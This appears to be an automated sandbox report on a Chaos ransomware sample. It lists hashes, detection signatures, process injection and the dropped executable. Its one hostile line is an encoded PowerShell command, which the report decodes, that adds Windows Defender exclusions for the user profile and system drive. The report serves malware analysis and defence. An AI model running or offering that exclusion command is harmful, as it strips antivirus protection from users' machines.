Analysis
Max time kernel: 119s
Max time network: 139s
Platform: windows7_x64
Resource: win7-20240221-en
Resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
Submitted: 14-03-2024 19:27
Static task: static1
Behavioral task: behavioral1
  Sample: Version 6.8.exe
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: Version 6.8.exe
  Resource: win10v2004-20240226-en
General
Target: Version 6.8.exe
Size: 1.3MB
MD5: 5b5065f49718bd167911f12eec35a942
SHA1: fe005ea9e2e572c79e881e1c57a21585a9577841
SHA256: 4265e1f20a3443c5d9401bc2a27d4014ae75c931d60dcd87124e9d01a943a66e
SHA512: e33adb710d12380b8cb00c2092ab43f7eb7d2488d07ddee5fba360c0858f8113a008d99780a4da6f35fccc81b3a18058a266481714c8040d57041923d35ab9bb
SSDEEP: 24576:a67Q2xXDBqBdEa+rfhtb5VUkxD/eL+wP+wJtXJtZW6N9VgWVB:aYQ2xXDBUdGNr5xD/SPpXtWiHgmB
Malware Config
Signatures
Chaos
Ransomware family first seen in June 2021.

Chaos Ransomware (2 IoCs)
Processes (resource / yara_rule):
  C:\Users\Admin\AppData\Roaming\Version 2.8.exe -> family_chaos
  behavioral1/memory/2644-14-0x00000000008D0000-0x000000000090E000-memory.dmp -> family_chaos

Executes dropped EXE (1 IoC)
Processes (pid / process):
  2644 Version 2.8.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes (pid / process):
  2644 Version 2.8.exe
  2644 Version 2.8.exe
  2644 Version 2.8.exe
  2552 powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes (description / pid / process):
  Token: SeDebugPrivilege  2644 Version 2.8.exe
  Token: SeDebugPrivilege  2552 powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
Processes (description / pid / process / target process):
  PID 3008 wrote to memory of 2552  3008 Version 6.8.exe -> powershell.exe
  PID 3008 wrote to memory of 2552  3008 Version 6.8.exe -> powershell.exe
  PID 3008 wrote to memory of 2552  3008 Version 6.8.exe -> powershell.exe
  PID 3008 wrote to memory of 2644  3008 Version 6.8.exe -> Version 2.8.exe
  PID 3008 wrote to memory of 2644  3008 Version 6.8.exe -> Version 2.8.exe
  PID 3008 wrote to memory of 2644  3008 Version 6.8.exe -> Version 2.8.exe
  PID 2644 wrote to memory of 2448  2644 Version 2.8.exe -> WerFault.exe
  PID 2644 wrote to memory of 2448  2644 Version 2.8.exe -> WerFault.exe
  PID 2644 wrote to memory of 2448  2644 Version 2.8.exe -> WerFault.exe
Processes
1. C:\Users\Admin\AppData\Local\Temp\Version 6.8.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\Version 6.8.exe"
   PID: 3008
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAcQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AeABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZABpACMAPgA="
      (The Base64/UTF-16LE payload decodes to: <#xqg#>Add-MpPreference <#nun#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#mxp#> -Force <#rdi#>, i.e. a Windows Defender exclusion for the user profile and system drive, padded with junk comment blocks.)
      PID: 2552
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
   2. C:\Users\Admin\AppData\Roaming\Version 2.8.exe
      Command line: "C:\Users\Admin\AppData\Roaming\Version 2.8.exe"
      PID: 2644
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\WerFault.exe
         Command line: C:\Windows\system32\WerFault.exe -u -p 2644 -s 568
         PID: 2448
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 223KB
MD5: 77a0989f046d5404700debc97727ca2b
SHA1: d0bdfdc67862e0bfa491d5d4a3313382a7921625
SHA256: 99b88ce97064536c370e630245018b15bf87c0c1113e2c4c95bfb7dc1078b647
SHA512: f918e3bf1d488cb77f06ede3d565396b8a6391f372e79fd6d148e1afec311143332bd91cb6d3f05fd6b348d40bfd4ae02adc79e20c6031aaa08c1d29d5b83aa9